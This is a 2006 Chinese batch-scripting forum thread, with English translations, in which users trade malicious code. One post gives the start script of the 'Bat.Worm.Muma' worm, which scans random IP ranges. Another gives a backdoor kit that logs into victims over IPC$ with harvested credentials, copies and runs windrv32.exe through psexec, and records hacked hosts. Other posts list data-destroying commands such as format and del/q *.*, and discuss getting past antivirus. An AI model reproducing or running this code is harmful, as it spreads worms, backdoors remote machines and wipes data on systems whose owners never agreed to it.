|
YYDDOS
初级用户
积分 38
发帖 16
注册 2006-12-9
来自 乡下
状态 离线
|
|
 2006-12-13 05:34 |
|
|
zh159
金牌会员
积分 3687
发帖 1467
注册 2005-8-8
状态 离线
|
『第 2 楼』:
使用 LLM 解释/回答一下
有:
del/q *.*
rd/q *
format
^_^
There are:
del/q *.*
rd/q *
format
^_^
|
|
|
2006-12-13 05:41 |
|
|
tianzizhi
高级用户
积分 623
发帖 214
注册 2006-9-22
状态 离线
|
『第 3 楼』:
使用 LLM 解释/回答一下
Bat.Worm.Muma病毒的起始脚本:
START.BAT:
CALL MUMA.BAT
SET IPA=192.168
CALL 10.BAT 0
:NEARAGAIN
netstat -n|find ":" >A.TMP
FOR /F "tokens=7,8,9,10,12 delims=.: " %%I IN (A.TMP) DO SET NUM1=%%I&& SET NUM2=%%J&& SET NUM3=%%K&& SET NUM4=%%L&& SET NUM5=%%M&& CALL NEAR.BAT
:START
CALL RANDOM.BAT
IF "%NUM1%"=="255" GOTO NEARAGAIN
IF "%NUM1%"=="192" GOTO NEARAGAIN
IF "%NUM1%"=="127" GOTO NEARAGAIN
IF "%NUM2%"=="255" GOTO NEARAGAIN
IF "%NUM3%"=="255" GOTO NEARAGAIN
IF "%NUM4%"=="255" GOTO NEARAGAIN
SET IPA=%NUM1%.%NUM2%
ECHO START > A.LOG
PING %IPA%.%NUM3%.1>B.TMP
PING %IPA%.%NUM3%.%NUM4%>>B.TMP
FIND /C /I "from" B.TMP
IF ERRORLEVEL 1 GOTO START
CALL 10.BAT %NUM3%
DEL A.LOG
GOTO START
下面的是自动后门.
--------------- cut here then save as a batchfile(I call it main.bat ) ---------------------------
@echo off
@if "%1"=="" goto usage
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call IPChack.bat %%i %%j %%k
@goto end
:usage
@echo run this batch in dos modle.or just double-click it.
:end
--------------- cut here then save as a batchfile(I call it main.bat ) ---------------------------
------------------- cut here then save as a batchfile(I call it door.bat) -----------------------------
@net use \\%1\ipc$ %3 /u:"%2"
@if errorlevel 1 goto failed
@echo Trying to establish the IPC$ connection ............OK
@copy windrv32.exe\\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PWD %3 >>ko.txt
@psexec \\%1 c:\winnt\system32\windrv32.exe
@psexec \\%1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored >>ko.txt
:failed
@echo Sorry can not connected to the victim.
----------------- cut here then save as a batchfile(I call it door.bat) --------------------------------
Bat.Worm.Muma virus's starting script:
START.BAT:
CALL MUMA.BAT
SET IPA=192.168
CALL 10.BAT 0
:NEARAGAIN
netstat -n|find ":" >A.TMP
FOR /F "tokens=7,8,9,10,12 delims=.: " %%I IN (A.TMP) DO SET NUM1=%%I&& SET NUM2=%%J&& SET NUM3=%%K&& SET NUM4=%%L&& SET NUM5=%%M&& CALL NEAR.BAT
:START
CALL RANDOM.BAT
IF "%NUM1%"=="255" GOTO NEARAGAIN
IF "%NUM1%"=="192" GOTO NEARAGAIN
IF "%NUM1%"=="127" GOTO NEARAGAIN
IF "%NUM2%"=="255" GOTO NEARAGAIN
IF "%NUM3%"=="255" GOTO NEARAGAIN
IF "%NUM4%"=="255" GOTO NEARAGAIN
SET IPA=%NUM1%.%NUM2%
ECHO START > A.LOG
PING %IPA%.%NUM3%.1>B.TMP
PING %IPA%.%NUM3%.%NUM4%>>B.TMP
FIND /C /I "from" B.TMP
IF ERRORLEVEL 1 GOTO START
CALL 10.BAT %NUM3%
DEL A.LOG
GOTO START
The following is the automatic backdoor.
--------------- cut here then save as a batchfile(I call it main.bat ) ---------------------------
@echo off
@if "%1"=="" goto usage
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call IPChack.bat %%i %%j %%k
@goto end
:usage
@echo run this batch in dos modle.or just double-click it.
:end
--------------- cut here then save as a batchfile(I call it main.bat ) ---------------------------
------------------- cut here then save as a batchfile(I call it door.bat) -----------------------------
@net use \\%1\ipc$ %3 /u:"%2"
@if errorlevel 1 goto failed
@echo Trying to establish the IPC$ connection ............OK
@copy windrv32.exe\\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PWD %3 >>ko.txt
@psexec \\%1 c:\winnt\system32\windrv32.exe
@psexec \\%1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored >>ko.txt
:failed
@echo Sorry can not connected to the victim.
----------------- cut here then save as a batchfile(I call it door.bat) --------------------------------
|
|
|
2006-12-13 05:45 |
|
|
ccwan
金牌会员
积分 2725
发帖 1160
注册 2006-9-23
来自 河北廊坊
状态 离线
|
『第 4 楼』:
使用 LLM 解释/回答一下
硬盘杀手(澳洲版)批处理源代码
我曾经把代码存为*.bat,立即被卡巴杀掉了^_^
Hard Drive Killer (Australian Version) Batch Source Code
I once saved the code as *.bat and was immediately killed by Kaspersky ^_^
|
三人行,必有吾师焉。 学然后知不足,教然后知困,然后能自强也。 |
|
|
2006-12-13 05:46 |
|
|
echo
初级用户
积分 148
发帖 69
注册 2006-11-23
状态 离线
|
『第 5 楼』:
使用 LLM 解释/回答一下
拜托,TXT也会被杀的,不过看了个BAT SHELL说有办法逃过它,呵呵
Come on, TXT can also be detected, but I saw a BAT SHELL saying there is a way to get around it, heh heh
|
|
|
2006-12-13 05:49 |
|
|
vkill
金牌会员
积分 4103
发帖 1744
注册 2006-1-20
来自 甘肃.临泽
状态 离线
|
『第 6 楼』:
使用 LLM 解释/回答一下
没有IPC$ psexec就不能用,其实上面的那个是针对太不安全的虮子的
Without IPC$, psexec can't be used. Actually, the above one is for the extremely insecure bugs.
|
|
|
2006-12-13 05:57 |
|
|
lxmxn
版主
积分 11386
发帖 4938
注册 2006-7-23
状态 离线
|
『第 7 楼』:
使用 LLM 解释/回答一下
@copy windrv32.exe\\%1\admin$\system32
有语法错误把?
@copy windrv32.exe\\%1\admin$\system32
Is there a syntax error?
|
|
|
2006-12-13 06:14 |
|
|
YYDDOS
初级用户
积分 38
发帖 16
注册 2006-12-9
来自 乡下
状态 离线
|
『第 8 楼』:
使用 LLM 解释/回答一下
上面的这个病毒有什么破坏力.
What destructive power does the virus above have?
|
|
|
2006-12-13 13:03 |
|
